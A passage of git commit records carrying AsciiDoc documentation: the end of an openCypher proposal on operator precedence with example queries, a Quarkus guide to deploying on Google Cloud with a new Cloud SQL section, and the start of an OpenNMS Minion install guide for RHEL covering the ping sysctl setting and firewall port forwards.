https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Addition]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Substraction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AndExpression[Boolean conjunction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=OrExpression[Boolean inclusive disjunction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=OrExpression[Boolean exclusive disjunction]\n\nExample expressions are\n\n* `5 * 4 * 3`\n* `5 ^ 4 ^ 3`\n* `5 \/ 4 \/ 3`\n* `5 % 4 % 3`\n* `5 % 4 * 3`\n* `5 - 4 - 3`\n* `5 - 4 + 3`\n* `5 + 4 + 3`\n* `TRUE AND FALSE AND TRUE`\n* `TRUE OR FALSE OR TRUE`\n* `TRUE XOR FALSE XOR TRUE`\n\n[IMPORTANT]\n.Chains of binary operators\n====\nIn chains of binary operators, the operator have left-to-right associativity, i.e. for every two operators, the operator appear earlier (more left) in the query string takes precedence and the operator tree is left-deep.\n====\n\n[NOTE]\n.Associative binary operators\n====\nWhere the semantics of operator is associative (e.g. addition), a right-deep operator tree produces the same result as a left-deep operator tree.\n====\n\nConsequently, the examples evaluate as follows:\n\n[cols=\"2a,1a\"]\n|====\n|\n[source, cypher]\n----\nRETURN 5 * 4 * 3 AS a,\n (5 * 4)* 3 AS b,\n 5 *(4 * 3) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!60!60!60\n!====\n\n|\n[source, cypher]\n----\nRETURN 4 ^ 3 ^ 2 AS a,\n (4 ^ 3)^ 2 AS b,\n 4 ^(3 ^ 2) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 4096.0 ! 4096.0 ! 262144.0\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 \/ 4 \/ 3 AS a,\n (5 \/ 4)\/ 3 AS b,\n 5 \/(4 \/ 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 0 ! 0 ! 5\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 % 4 % 3 AS a,\n (5 % 4)% 3 AS b,\n 5 %(4 % 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 1 ! 1 ! 0\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 % 4 * 3 AS a,\n (5 % 4)* 3 AS b,\n 5 %(4 * 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 3 ! 3 ! 5\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 - 4 - 3 AS a,\n (5 - 4)- 3 AS b,\n 5 -(4 - 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! -2 ! -2 ! 4\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 - 4 + 3 AS a,\n (5 - 4)+ 3 AS b,\n 5 -(4 + 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 4 ! 4 ! -2\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 + 4 + 3 AS a,\n (5 + 4)+ 3 AS b,\n 5 +(4 + 3) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!12!12!12\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE AND FALSE AND TRUE AS a,\n (TRUE AND FALSE) AND TRUE AS b,\n TRUE AND (FALSE AND TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!false!false!false\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE OR FALSE OR TRUE AS a,\n (TRUE OR FALSE) OR TRUE AS b,\n TRUE OR (FALSE OR TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!true!true!true\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE XOR FALSE XOR TRUE AS a,\n (TRUE XOR FALSE) XOR TRUE AS b,\n TRUE XOR (FALSE XOR TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!false!false!false\n!====\n\n|====\n\n==== Chains with extra semantics\nOperators whose chaining gives extra semantics are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ComparisonExpression[Comparison operations]\n\nExample expression are\n\n* `5 = 5 = 5`\n* `5 = 4 <> 3`\n* `5 <> 4 > 3`\n* `5 > 4 > 3`\n* `5 > 4 >= 3`\n* `5 >= 4 < 3`\n\n[IMPORTANT]\n.Chains with extra semantics\n====\nChains with extra semantics, either\n\na. form a flat operator tree of a single operator, or\nb. their semantics is defined by a syntax transformation to an expression that has an unambiguous operator tree based on the other precedence rules stated in this document.\n====\n\n[NOTE]\n.Associativity of comparison operators\n====\nBecause of the extra semantics of a chain of comparison, the comparison operators do not have any observable associativity in openCypher.\n====\n\nConsequently, the examples evaluate as follows:\n\n[cols=\"2a,1a\"]\n|====\n|\n[source, cypher]\n----\nRETURN 5 = 5 = 5 AS a,\n (5 = 5) AND (5 = 5) AS ax,\n (5 = 5)= 5 AS b,\n 5 =(5 = 5) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! false ! false\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 = 4 <> 3 AS a,\n (5 = 4) AND (4 <> 3) AS ax,\n (5 = 4)<> 3 AS b,\n 5 =(4 <> 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! false ! false ! true ! false\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 <> 4 > 3 AS a,\n (5 <> 4) AND (4 > 3) AS ax,\n (5 <> 4)> 3 AS b,\n 5 <>(4 > 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! true\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 > 4 > 3 AS a,\n (5 > 4) AND (4 > 3) AS ax,\n (5 > 4)> 3 AS b,\n 5 >(4 > 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! null\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 > 4 >= 3 AS a,\n (5 > 4) AND (4 >= 3) AS ax,\n (5 > 4)>= 3 AS b,\n 5 >(4 >= 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! null\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 <= 4 < 3 AS a,\n (5 <= 4) AND (4 < 3) AS ax,\n (5 <= 4)< 3 AS b,\n 5 <=(4 < 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! false ! false ! null ! null\n!====\n\n|====\n\n== What others do\n\nopenCypher has grammatically all operators in one precedence level hierarchy.\nThis is similar to how precedence is defined for more programming languages.\nFor instance:\n\n* https:\/\/docs.oracle.com\/javase\/tutorial\/java\/nutsandbolts\/operators.html[Java]\n* https:\/\/docs.python.org\/3\/reference\/expressions.html#operator-precedence[Python]\n* https:\/\/en.cppreference.com\/w\/cpp\/language\/operator_precedence[C++]\n* https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/JavaScript\/Reference\/Operators\/Operator_Precedence#table[Javascript]\n\nThe precedence is similar.\nSome minor difference:\n\n* Programming languages have extra operators openCypher does not have, e.g. increment\/decrement, bitwise operators, ternary operator, and assignments\n* In Javascript exponentiation is right-to-left associative\n\nSQL encodes large parts of the type compatibility of expressions in the grammar.\nHence, its precedence hierarchy is partition by type.\nWithin one type, SQL's precedence hierarchy is similar.\n\nChainable operators, such as addition, multiplication, etc. are left-to-right associative in SQL as well.\nHowever, SQL directly encode that in the grammar, with left-recursive production rules, e.g.\n\n[source, ebnf]\n----\n<numeric value expression> ::=\n <term>\n | <numeric value expression> <plus sign> <term>\n | <numeric value expression> <minus sign> <term>\n\n<term> ::=\n <factor>\n | <term> <asterisk> <factor>\n | <term> <solidus> <factor>\n\n<factor> ::=\n [ <sign> ] <numeric primary>\n----\n\nMost program and query language do not give chains of comparison operators extra semantics.\nTypically, comparison operators are left-to-right associative.\n\n== Benefits to this proposal\n\nThis CIP clarifies the precedence rules of openCypher.\n\n== Caveats to this proposal\n\nNone known.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f91ac6f7afef5617c6ddbbce600bfd59f3d32e2a","subject":"Document how to connect to cloud SQL","message":"Document how to connect to cloud SQL\n\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/deploying-to-google-cloud.adoc","new_file":"docs\/src\/main\/asciidoc\/deploying-to-google-cloud.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Deploying to Google Cloud Platform (GCP)\n\ninclude::.\/attributes.adoc[]\n\nThis guide covers:\n\n* Login to Google Cloud\n* Deploying a function to Google Cloud Functions\n* Deploying a JAR to Google App Engine Standard\n* Deploying a Docker image to Google App Engine Flexible Custom Runtimes\n* Deploying a Docker image to Google Cloud Run\n* Using Cloud SQL\n\n== Prerequisites\n\nFor this guide you need:\n\n* Roughly 1 hour for all modalities\n* JDK 11\n* Apache Maven {maven-version}\n* https:\/\/cloud.google.com\/[A Google Cloud Account]. Free accounts work.\n* https:\/\/cloud.google.com\/sdk[Cloud SDK CLI Installed]\n\nThis guide will take as input an application developed in the link:getting-started[Getting Started guide].\n\nMake sure you have the getting-started application at hand, or clone the Git repository: `git clone {quickstarts-clone-url}`,\nor download an {quickstarts-archive-url}[archive]. The solution is located in the `getting-started` directory.\n\n== Login to Google Cloud\n\nLogin to Google Cloud is necessary for deploying the application and it can be done as follows:\n\n[source, subs=attributes+]\n----\ngcloud auth login\n----\n\n== Deploying to Google Cloud Functions\n\nQuarkus supports deploying your application to Google Cloud Functions via the following extensions:\n\n- link:gcp-functions[Google Cloud Functions]: Build functions using the Google Cloud Functions API.\n- link:gcp-functions-http[Google Cloud Functions HTTP binding]: Build functions using Quarkus HTTP APIs: RESTEasy (JAX-RS),\nUndertow (Servlet), Vert.x Web, or link:funqy-http[Funqy HTTP].\n- link:funqy-gcp-functions[Funky Google Cloud Functions]: Build functions using Funqy.\n\nEach extension supports a specific kind of application development,\nfollow the specific guides for more information on how to develop, package and deploy your applications using them.\n\n== Deploying to Google App Engine Standard\n\nWe will only cover the Java 11 runtime as the Java 8 runtime uses its own Servlet engine which is not compatible with Quarkus.\n\nFirst of all, make sure to have an App Engine environment initialized for your Google Cloud project, if not, initialize one via `gcloud app create --project=[YOUR_PROJECT_ID]`.\n\nThen, you will need to create a `src\/main\/appengine\/app.yaml` file, let's keep it minimalistic with only the selected engine:\n\n[source, yaml]\n----\nruntime: java11\n----\n\nThis will create a default service for your App Engine application.\n\nThen, you can choose to build the application by yourself or letting `gcloud` or the Google Cloud Maven plugin build it for you.\n\n=== Building the application manually\n\nSet up your application to be packaged as an uber-jar via your `application.properties` file:\n\n[source, properties]\n----\nquarkus.package.type=uber-jar\n----\n\nUse Maven to build the application using `mvn clean package`, it will generate a single JAR that contains all the classes of your application including its dependencies.\n\nFinally, use `gcloud` to deploy your application as an App Engine service.\n\n[source, shell script]\n----\ngcloud app deploy target\/getting-started-1.0.0-SNAPSHOT-runner.jar\n----\n\nThis command will upload your application jar and launch it on App Engine.\n\nWhen done, the output will display the URL of your application (target url), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n=== Building the application via gcloud\n\nYou can choose to let `gcloud` build your application for you, this is the simplest way to deploy to App Engine.\n\nJust launch `gcloud app deploy` in the root of your project, it will upload all your project files (the list can be reduced via the `.gcloudignore` file),\npackage your JAR via Maven (or Gradle) and launch it on App Engine.\n\nWhen done, the output will display the URL of your application (target url), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n=== Building the application via the Google Cloud Maven plugin\n\nYou can also let Maven control the deployment of your application using the App Engine Maven plugin.\n\nFirst, add the plugin to your `pom.xml`:\n\n[source,xml]\n----\n<plugin>\n <groupId>com.google.cloud.tools<\/groupId>\n <artifactId>appengine-maven-plugin<\/artifactId>\n <version>2.4.0<\/version>\n <configuration>\n <projectId>GCLOUD_CONFIG<\/projectId> <1>\n <version>gettingstarted<\/version>\n <artifact>${project.build.directory}\/getting-started-${project.version}-runner.jar<\/artifact> <2>\n <\/configuration>\n<\/plugin>\n----\n\n1. Use the default `gcloud` configuration\n2. Override the default JAR name to the one generated by the Quarkus Maven plugin\n\nThen you would be able to use Maven to build and deploy your application to App Engine via `mvn clean package appengine:deploy`.\n\nWhen it\u2019s done, the output will display the URL of your application (target URL), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n== Deploying to Google App Engine Flexible Custom Runtimes\n\nBefore all, make sure to have an App Engine environment initialized for your Google Cloud project, if not, initialize one via `gcloud app create --project=[YOUR_PROJECT_ID]`.\n\nApp Engine Flexible Custom Runtimes uses a Docker image to run your application.\n\nFirst, create an `app.yaml` file at the root of your project with the following content:\n\n[source, yaml]\n----\nruntime: custom\nenv: flex\n----\n\nApp Engine Flexible Custom Runtimes deploys your application as a Docker container, you can choose to deploy one of the Dockerfile provided inside your application.\n\nBoth JVM and native executable versions will work.\n\nTo deploy a JVM application:\n\n- Copy the JVM Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.jvm Dockerfile`.\n- Build your application using `mvn clean package`.\n\nTo deploy a native application:\n\n- Copy the native Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.native Dockerfile`.\n- Build your application as a native executable using `mvn clean package -Dnative`.\n\nFinally, launch `gcloud app deploy` in the root of your project, it will upload all your project files (the list can be reduced via the `.gcloudignore` file),\nbuild your Dockerfile and launch it on App Engine Flexible custom runtime.\n\nIt uses Cloud Build to build your Docker image and deploy it to Google Container Registry (GCR).\n\nWhen done, the output will display the URL of your application (target url), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\nNOTE: App Engine Flexible custom runtimes support link:https:\/\/cloud.google.com\/appengine\/docs\/flexible\/custom-runtimes\/configuring-your-app-with-app-yaml#updated_health_checks[health checks],\nit is strongly advised to provide them thanks to Quarkus link:microprofile-health[Microprofile Health] support.\n\n== Deploying to Google Cloud Run\n\nGoogle Cloud Run allows you to run your Docker containers inside Google Cloud Platform in a managed way.\n\nNOTE: By default, Quarkus listens on port 8080, and it's also the Cloud Run default port.\nNo need to use the `PORT` environment variable defined in Cloud Run to customize the Quarkus HTTP port.\n\nCloud Run will use Cloud Build to build your Docker image and deploy it to Google Container Registry (GCR).\n\nBoth JVM and native executable versions will work.\n\nTo deploy a JVM application:\n\n- Copy the JVM Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.jvm Dockerfile`.\n- Build your application using `mvn clean package`.\n\nTo deploy a native application:\n\n- Copy the native Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.native Dockerfile`.\n- Build your application as a native executable using `mvn clean package -Dnative`.\n\nThen, create a `.gcloudignore` file to tell gcloud which files should be not be uploaded for Cloud Build,\nwithout it, it defaults to `.gitignore` that usually exclude the target directory where you packaged application has been created.\n\nIn this example, I only exclude the `src` directory:\n\n[source]\n----\nsrc\/\n----\n\nThen, use Cloud Build to build your image, it will upload to a Google Cloud Storage bucket all the files of your application (except the ones ignored by the `.gcloudignore`file),\nbuild your Docker image and push it to Google Container Registry (GCR).\n\n[source, shell script]\n----\ngcloud builds submit --tag gcr.io\/PROJECT-ID\/helloworld\n----\n\nNOTE: You can also build your image locally and push it to a publicly accessible Docker registry, then use this image in the next step.\n\nFinally, use Cloud Run to launch your application.\n\n[source, shell script]\n----\ngcloud run deploy --image gcr.io\/PROJECT-ID\/helloworld --platform managed\n----\n\nCloud run will ask you questions on the service name, the region and whether or not unauthenticated calls are allowed.\nAfter you answer to these questions, it will deploy your application.\n\nWhen the deployment is done, the output will display the URL to access your application.\n\n== Using Cloud SQL\n\nGoogle Cloud SQL provides managed instances for MySQL, PostgreSQL and SQLServer.\nQuarkus has support for all three databases.\n\nTo make them work with Cloud SQL, you first need to use the corresponding JDBC extension, for example, for PostgreSQL,\nadd the `jdbc-postgresql` extension.\n\nThen you need to add to your pom.xml the Cloud SQL JDBC library that provides the connectivity to Cloud SQL,\nfor PostgreSQL you'll need to include the following dependency :\n\n[code, xml]\n----\n<dependency>\n <groupId>com.google.cloud.sql<\/groupId>\n <artifactId>postgres-socket-factory<\/artifactId>\n <version>${postgres-socket-factory.version}<\/version>\n<\/dependency>\n----\n\nFinally, you need to configure your datasource specifically to use the socket factory :\n\n[source, properties]\n----\nquarkus.datasource.db-kind=other #<1>\nquarkus.datasource.jdbc.url=jdbc:postgresql:\/\/\/mydabatabe #<2>\nquarkus.datasource.jdbc.driver=org.postgresql.Driver\nquarkus.datasource.username=quarkus\nquarkus.datasource.password=quarkus\nquarkus.datasource.jdbc.additional-jdbc-properties.cloudSqlInstance=project-id:gcp-region:instance #<3>\nquarkus.datasource.jdbc.additional-jdbc-properties.socketFactory=com.google.cloud.sql.postgres.SocketFactory #<4>\n----\n\n1. Database kind must be 'other' as we need to skip Quarkus auto-configuration.\n2. The JDBC URL should not include the hostname \/ IP of the database.\n3. We add the `cloudSqlInstance` additional JDBC property to configure the instance id.\n4. We add the `socketFactory` additional JDBC property to configure the socket factory used to connect to Cloud SQL,\nthis one is coming from the `postgres-socket-factory` dependency.\n\nNOTE: If you use Hibernate, you also need to configure `quarkus.hibernate-orm.dialect=org.hibernate.dialect.PostgreSQL10Dialect` as Hibernate\nwould not be able to automatically detect the dialect of your database.\n\nWARNING: Using a PostgreSQL socket factory is not possible on dev mode due to link:https:\/\/github.com\/quarkusio\/quarkus\/issues\/15782[#15782].\n\n== Going further\n\nYou can find a set of extensions to access various Google Cloud Services in the Quarkiverse (a GitHub organization for Quarkus extensions maintained by the community),\nincluding PubSub, BigQuery, Storage, Spanner, Firestore, Secret Manager (visit the repository for an accurate list of supported services).\n\nYou can find some documentation about them in the link:https:\/\/github.com\/quarkiverse\/quarkiverse-google-cloud-services[Quarkiverse Google Cloud Services repository].\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Deploying to Google Cloud Platform (GCP)\n\ninclude::.\/attributes.adoc[]\n\nThis guide covers:\n\n* Login to Google Cloud\n* Deploying a function to Google Cloud Functions\n* Deploying a JAR to Google App Engine Standard\n* Deploying a Docker image to Google App Engine Flexible Custom Runtimes\n* Deploying a Docker image to Google Cloud Run\n\n== Prerequisites\n\nFor this guide you need:\n\n* Roughly 1 hour for all modalities\n* JDK 11\n* Apache Maven {maven-version}\n* https:\/\/cloud.google.com\/[A Google Cloud Account]. Free accounts work.\n* https:\/\/cloud.google.com\/sdk[Cloud SDK CLI Installed]\n\nThis guide will take as input an application developed in the link:getting-started[Getting Started guide].\n\nMake sure you have the getting-started application at hand, or clone the Git repository: `git clone {quickstarts-clone-url}`,\nor download an {quickstarts-archive-url}[archive]. The solution is located in the `getting-started` directory.\n\n== Login to Google Cloud\n\nLogin to Google Cloud is necessary for deploying the application and it can be done as follows:\n\n[source, subs=attributes+]\n----\ngcloud auth login\n----\n\n== Deploying to Google Cloud Functions\n\nQuarkus supports deploying your application to Google Cloud Functions via the following extensions:\n\n- link:gcp-functions[Google Cloud Functions]: Build functions using the Google Cloud Functions API.\n- link:gcp-functions-http[Google Cloud Functions HTTP binding]: Build functions using Quarkus HTTP APIs: RESTEasy (JAX-RS),\nUndertow (Servlet), Vert.x Web, or link:funqy-http[Funqy HTTP].\n- link:funqy-gcp-functions[Funky Google Cloud Functions]: Build functions using Funqy.\n\nEach extension supports a specific kind of application development,\nfollow the specific guides for more information on how to develop, package and deploy your applications using them.\n\n== Deploying to Google App Engine Standard\n\nWe will only cover the Java 11 runtime as the Java 8 runtime uses its own Servlet engine which is not compatible with Quarkus.\n\nFirst of all, make sure to have an App Engine environment initialized for your Google Cloud project, if not, initialize one via `gcloud app create --project=[YOUR_PROJECT_ID]`.\n\nThen, you will need to create a `src\/main\/appengine\/app.yaml` file, let's keep it minimalistic with only the selected engine:\n\n[source, yaml]\n----\nruntime: java11\n----\n\nThis will create a default service for your App Engine application.\n\nThen, you can choose to build the application by yourself or letting `gcloud` or the Google Cloud Maven plugin build it for you.\n\n=== Building the application manually\n\nSet up your application to be packaged as an uber-jar via your `application.properties` file:\n\n[source, properties]\n----\nquarkus.package.type=uber-jar\n----\n\nUse Maven to build the application using `mvn clean package`, it will generate a single JAR that contains all the classes of your application including its dependencies.\n\nFinally, use `gcloud` to deploy your application as an App Engine service.\n\n[source, shell script]\n----\ngcloud app deploy target\/getting-started-1.0.0-SNAPSHOT-runner.jar\n----\n\nThis command will upload your application jar and launch it on App Engine.\n\nWhen done, the output will display the URL of your application (target url), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n=== Building the application via gcloud\n\nYou can choose to let `gcloud` build your application for you, this is the simplest way to deploy to App Engine.\n\nJust launch `gcloud app deploy` in the root of your project, it will upload all your project files (the list can be reduced via the `.gcloudignore` file),\npackage your JAR via Maven (or Gradle) and launch it on App Engine.\n\nWhen done, the output will display the URL of your application (target url), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n=== Building the application via the Google Cloud Maven plugin\n\nYou can also let Maven control the deployment of your application using the App Engine Maven plugin.\n\nFirst, add the plugin to your `pom.xml`:\n\n[source,xml]\n----\n<plugin>\n <groupId>com.google.cloud.tools<\/groupId>\n <artifactId>appengine-maven-plugin<\/artifactId>\n <version>2.4.0<\/version>\n <configuration>\n <projectId>GCLOUD_CONFIG<\/projectId> <1>\n <version>gettingstarted<\/version>\n <artifact>${project.build.directory}\/getting-started-${project.version}-runner.jar<\/artifact> <2>\n <\/configuration>\n<\/plugin>\n----\n\n1. Use the default `gcloud` configuration\n2. Override the default JAR name to the one generated by the Quarkus Maven plugin\n\nThen you would be able to use Maven to build and deploy your application to App Engine via `mvn clean package appengine:deploy`.\n\nWhen it\u2019s done, the output will display the URL of your application (target URL), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\n== Deploying to Google App Engine Flexible Custom Runtimes\n\nBefore all, make sure to have an App Engine environment initialized for your Google Cloud project, if not, initialize one via `gcloud app create --project=[YOUR_PROJECT_ID]`.\n\nApp Engine Flexible Custom Runtimes uses a Docker image to run your application.\n\nFirst, create an `app.yaml` file at the root of your project with the following content:\n\n[source, yaml]\n----\nruntime: custom\nenv: flex\n----\n\nApp Engine Flexible Custom Runtimes deploys your application as a Docker container, you can choose to deploy one of the Dockerfile provided inside your application.\n\nBoth JVM and native executable versions will work.\n\nTo deploy a JVM application:\n\n- Copy the JVM Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.jvm Dockerfile`.\n- Build your application using `mvn clean package`.\n\nTo deploy a native application:\n\n- Copy the native Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.native Dockerfile`.\n- Build your application as a native executable using `mvn clean package -Dnative`.\n\nFinally, launch `gcloud app deploy` in the root of your project, it will upload all your project files (the list can be reduced via the `.gcloudignore` file),\nbuild your Dockerfile and launch it on App Engine Flexible custom runtime.\n\nIt uses Cloud Build to build your Docker image and deploy it to Google Container Registry (GCR).\n\nWhen done, the output will display the URL of your application (target url), you can use it with curl or directly open it in your browser using `gcloud app browse`.\n\nNOTE: App Engine Flexible custom runtimes support link:https:\/\/cloud.google.com\/appengine\/docs\/flexible\/custom-runtimes\/configuring-your-app-with-app-yaml#updated_health_checks[health checks],\nit is strongly advised to provide them thanks to Quarkus link:microprofile-health[Microprofile Health] support.\n\n== Deploying to Google Cloud Run\n\nGoogle Cloud Run allows you to run your Docker containers inside Google Cloud Platform in a managed way.\n\nNOTE: By default, Quarkus listens on port 8080, and it's also the Cloud Run default port.\nNo need to use the `PORT` environment variable defined in Cloud Run to customize the Quarkus HTTP port.\n\nCloud Run will use Cloud Build to build your Docker image and deploy it to Google Container Registry (GCR).\n\nBoth JVM and native executable versions will work.\n\nTo deploy a JVM application:\n\n- Copy the JVM Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.jvm Dockerfile`.\n- Build your application using `mvn clean package`.\n\nTo deploy a native application:\n\n- Copy the native Dockerfile to the root directory of your project: `cp src\/main\/docker\/Dockerfile.native Dockerfile`.\n- Build your application as a native executable using `mvn clean package -Dnative`.\n\nThen, create a `.gcloudignore` file to tell gcloud which files should be not be uploaded for Cloud Build,\nwithout it, it defaults to `.gitignore` that usually exclude the target directory where you packaged application has been created.\n\nIn this example, I only exclude the `src` directory:\n\n[source]\n----\nsrc\/\n----\n\nThen, use Cloud Build to build your image, it will upload to a Google Cloud Storage bucket all the files of your application (except the ones ignored by the `.gcloudignore`file),\nbuild your Docker image and push it to Google Container Registry (GCR).\n\n[source, shell script]\n----\ngcloud builds submit --tag gcr.io\/PROJECT-ID\/helloworld\n----\n\nNOTE: You can also build your image locally and push it to a publicly accessible Docker registry, then use this image in the next step.\n\nFinally, use Cloud Run to launch your application.\n\n[source, shell script]\n----\ngcloud run deploy --image gcr.io\/PROJECT-ID\/helloworld --platform managed\n----\n\nCloud run will ask you questions on the service name, the region and whether or not unauthenticated calls are allowed.\nAfter you answer to these questions, it will deploy your application.\n\nWhen the deployment is done, the output will display the URL to access your application.\n\n== Going further\n\nYou can find a set of extensions to access various Google Cloud Services in the Quarkiverse (a GitHub organization for Quarkus extensions maintained by the community),\nincluding PubSub, BigQuery, Storage, Spanner, Firestore (visit the repository for an accurate list of supported services).\n\nYou can find some documentation about them in the link:https:\/\/github.com\/quarkiverse\/quarkiverse-google-cloud-services[Quarkiverse Google Cloud Services repository].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bead66e0edb86ae4cc7d3c12a7f49f4fc9e4a5dc","subject":"HZN-621 add documentation on port forwards and ICMP sysctl","message":"HZN-621 add documentation on port forwards and ICMP sysctl\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/minion\/rhel.adoc","new_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/minion\/rhel.adoc","new_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/images\n\n[[gi-install-minion-rhel]]\n=== RHEL\n\nNOTE: This description was built on _RHEL 7_ and _CentOS 7.1_.\n\n==== Install Minion\n\nStart by <<gi-install-opennms-yum-repo,setting up the OpenNMS Yum repository>> and <<gi-install-oracle-java,installing Java>>.\n\nNOTE: OpenNMS Minion currently requires a JDK. See http:\/\/issues.opennms.org\/browse\/HZN-620[HZN-620] for details.\n\nOnce the _Yum_ repository has been configured:\n\n.Install the _Minion_ packages\n[source, bash]\n----\nyum -y install opennms-minion\n----\n\nThe following packages will be automatically installed:\n\n* _opennms-minion_: The Minion meta package\n* _opennms-minion-container_: The _Karaf_ OSGi container with _Minion_ branding and additional management extensions\n* _opennms-minion-features-core_: Core utilities and services required by the _Minion_ features\n* _opennms-minion-features-default_: Service-specific features\n\nThe _Minion_ packages setup the following directory structure:\n\n[source, shell]\n----\n[root@localhost \/opt\/minion]# $ tree -L 1\n.\n\u251c\u2500\u2500 bin\n\u251c\u2500\u2500 deploy\n\u251c\u2500\u2500 etc\n\u251c\u2500\u2500 lib\n\u251c\u2500\u2500 repositories\n\u2514\u2500\u2500 system\n----\n\n[[gi-install-minion-rhel-ping]]\n==== Configure Linux to Allow Non-Root ICMP\n\nBy default, Linux does not allow regular users to perform `ping` operations from arbitrary programs (including Java). To enable the Minion to ping properly, you must set a sysctl option.\n\n.Enable User Ping (Running System)\n[source, shell]\n----\n# run this command as root to allow ping by any user (does not survive reboots)\nsysctl net.ipv4.ping_group_range='0 429496729'\n----\n\nIf you wish to restrict the range further, use the GID for the user the Minion will run as, rather than `429496729`.\n\nTo enable this permanently, create a file in `\/etc\/sysctl.d\/` to set the range:\n\n.\/etc\/sysctl.d\/99-zzz-non-root-icmp.conf\n[source, shell]\n----\n# we start this filename with \"99-zzz-\" to make sure it's last, after anything else that might have set it\nnet.ipv4.ping_group_range=0 429496729\n----\n\n[[gi-install-minion-rhel-trapd]]\n==== Configure Minion to Receive Traps\n\nIf you wish your Minion to listen to SNMP traps, you will need to configure your firewall to port forward from the priviledged trap port (162) to the Minion's default trap listener on port 1162.\n\n.Forward 1162 to 162 with Firewalld\n[source, shell]\n----\n# enable masquerade to allow port-forwards\nfirewall-cmd --add-masquerade\n# forward port 162 TCP and UDP to port 162 on localhost\nfirewall-cmd --add-forward-port=port=162:proto=udp:toport=1162:toaddr=127.0.0.1\nfirewall-cmd --add-forward-port=port=162:proto=tcp:toport=1162:toaddr=127.0.0.1\n----\n\n[[gi-install-minion-rhel-syslogd]]\n==== Configure Minion to Receive Syslog Messages\n\nIf you wish your Minion to listen to syslog messages, you will need to configure your firewall to port forward from the priviledged syslog port (514) to the Minion's default syslog listener on port 1514.\n\n.Forward 1514 to 514 with Firewalld\n[source, shell]\n----\n# enable masquerade to allow port-forwards\nfirewall-cmd --add-masquerade\n# forward port 514 TCP and UDP to port 514 on 